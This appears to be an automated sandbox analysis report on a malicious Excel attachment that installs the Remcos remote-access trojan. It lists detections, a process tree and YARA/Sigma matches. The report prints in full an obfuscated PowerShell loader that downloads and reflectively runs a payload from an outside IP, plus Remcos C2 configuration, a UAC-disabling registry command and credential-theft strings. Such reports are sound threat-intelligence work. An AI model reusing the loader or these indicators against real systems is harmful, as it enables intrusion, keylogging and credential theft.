Edit tour

Windows Analysis Report
Swift tract-20240506_120.xls

Overview

General Information

Sample name:	Swift tract-20240506_120.xls
Analysis ID:	1467963
MD5:	fb22b045b53f0c53685afc2b17c9bca8
SHA1:	2f42c1e432515a89f6c8c7802bc45a89e171b4a2
SHA256:	b407cd499a77383c21bc590bca7ac0e44ed224aa39ac73ea0e904170891b3684
Tags:	xls
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Microsoft Office launches external ms-search protocol handler (WebDAV)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Powershell Download and Execute IEX

Sigma detected: Remcos

Snort IDS alert for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Powershell download and execute

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious Excel or Word document

C2 URLs / IPs found in malware configuration

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Delayed program exit found

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for sample

Microsoft Office drops suspicious files

Obfuscated command line found

Office drops RTF file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Office viewer loads remote template

Shellcode detected

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: Potentially Suspicious Malware Callback Communication

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and execute PE files

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains Microsoft Equation 3.0 OLE entries

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Excel Network Connections

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1892 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

WINWORD.EXE (PID: 1848 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 2544 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

wscript.exe (PID: 3136 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)

powershell.exe (PID: 3196 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64'+'Length = YRCendIndex - YRCstartIndex; YRCbase64Command = YRCimageText.Substr'+'ing(YRCstartIndex, YRCbase64Length); '+'YRCcommandBytes = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'+'G , S'+'EGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new-image_v.jpgSEG; YRCwebClient = New-O'+'bject Sys'+'tem.Net.WebClient; try'+' { Y'+'RCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host'+' SEGFailed To download data from '+'YRClinkSEG -ForegroundColor Red; exit }; if ('+'YRCdownloadedData -ne YRCnull) { YRCimageText '+'= [System.Text.Encoding]::UTF8.G'+'et'+'St'+'ring(YRCdownloadedData)'+'; YRCstartFlag = SEG<<B'+'ASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexOf(YRCstartFlag); YRCendIndex = YRCimageText.IndexOf(YRCendFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCst'+'artIndex)'+' { YRCstartIndex += YRCstartFlag.Length; YRCbase64L'+'ength = YRCendI'+'ndex - YRCs'+'tartIndex; YRCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandByte'+'s = [System.Convert]::FromBase64String(YRCbase64Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcom'+'mandBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/'+'831.6'+'5.232.271//:p'+'tthSEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }').RePlACe(([ChaR]89+[ChaR]82+[ChaR]67),[sTRiNG][ChaR]36).RePlACe(([ChaR]83+[ChaR]69+[ChaR]71),[sTRiNG][ChaR]39)|Iex" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

RegAsm.exe (PID: 3332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "216.9.224.18:9943:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-Y7DJPP", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\not\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hu.hu.huhuh[1].doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x133e:$obj2: \objdata 0x1326:$obj3: \objupdate 0x1301:$obj5: \objautlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D58E1F0C.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x133e:$obj2: \objdata 0x1326:$obj3: \objupdate 0x1301:$obj5: \objautlink

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.1043182519.0000000000731000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000009.00000002.454028301.0000000003559000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x132f68:$a1: Remcos restarted by watchdog! 0x1334e0:$a3: %02i:%02i:%02i:%03i
00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000009.00000002.454028301.00000000036F9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x3575a0:$a1: Remcos restarted by watchdog! 0x357b18:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 3196	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3196	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: powershell.exe PID: 3196	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: powershell.exe PID: 3196	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xb7e49:$a1: Remcos restarted by watchdog! 0x247353:$a1: Remcos restarted by watchdog! 0xb83a3:$a3: %02i:%02i:%02i:%03i 0xb87d2:$a3: %02i:%02i:%02i:%03i 0x2478ad:$a3: %02i:%02i:%02i:%03i 0x247cdc:$a3: %02i:%02i:%02i:%03i
Process Memory Space: powershell.exe PID: 3196	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x142a9:$b2: ::FromBase64String( 0x1478d:$b2: ::FromBase64String( 0x15202:$b2: ::FromBase64String( 0x156e6:$b2: ::FromBase64String( 0x16fa1:$b2: ::FromBase64String( 0x17485:$b2: ::FromBase64String( 0x1b07f:$b2: ::FromBase64String( 0x1b563:$b2: ::FromBase64String( 0x1c061:$b2: ::FromBase64String( 0x1c545:$b2: ::FromBase64String( 0x1cfb4:$b2: ::FromBase64String( 0x1d498:$b2: ::FromBase64String( 0x2f5c9:$b2: ::FromBase64String( 0x2faad:$b2: ::FromBase64String( 0x30d67:$b2: ::FromBase64String( 0x3124b:$b2: ::FromBase64String( 0x31cba:$b2: ::FromBase64String( 0x3219e:$b2: ::FromBase64String( 0x32e27:$b2: ::FromBase64String( 0x3330b:$b2: ::FromBase64String( 0x35d0c:$b2: ::FromBase64String(
Process Memory Space: RegAsm.exe PID: 3332	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 3332	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: RegAsm.exe PID: 3332	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x10821:$a1: Remcos restarted by watchdog! 0x10d7b:$a3: %02i:%02i:%02i:%03i 0x111aa:$a3: %02i:%02i:%02i:%03i
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
9.2.powershell.exe.39e5af8.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.powershell.exe.39e5af8.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.powershell.exe.39e5af8.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
9.2.powershell.exe.39e5af8.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
9.2.powershell.exe.39e5af8.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
11.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.RegAsm.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
11.2.RegAsm.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
11.2.RegAsm.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
11.2.RegAsm.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
11.2.RegAsm.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
11.2.RegAsm.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
11.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
9.2.powershell.exe.39e5af8.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
9.2.powershell.exe.39e5af8.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
9.2.powershell.exe.39e5af8.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
9.2.powershell.exe.39e5af8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
Click to see the 14 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 172.232.56.138, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2544, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2544, TargetFilename: C:\Users\user\AppData\Roaming\goodflowersandgoodreturn.vBS

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [System.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativadoSEG , SEGdesativadoSEG , SEGdesativadoSEG,SEGRegAsmSEG,SEGSEG)) } }Set Scriptblock YRClink = SEGhttp://91.92.254.194/imge/new'+'-i'+'mage_v.jpgSE'+'G; YRCwebClient = Ne'+'w-Object System.Net.WebClient; try { YRCdownloadedDa'+'ta = YRCwebCli'+'ent.DownloadData(YRCl'+'ink) } catch { Wri'+'te-Host SEGFailed To download data from YRClinkSEG '+'-ForegroundColor Red; exit }; if (YRCdownloadedData -ne YRCnull) { Y'+'RCim'+'ageText = [System.Text.Encoding]::UTF8.GetString(YRCdownl'+'oadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex '+'= YRCimageText.IndexOf(YRCstartFlag); YRCend'+'In'+'dex = YRCimageText.IndexOf(YRCendFlag)'+'; if (YRCstar'+'tIndex -ge 0 -and YRCendIndex -gt 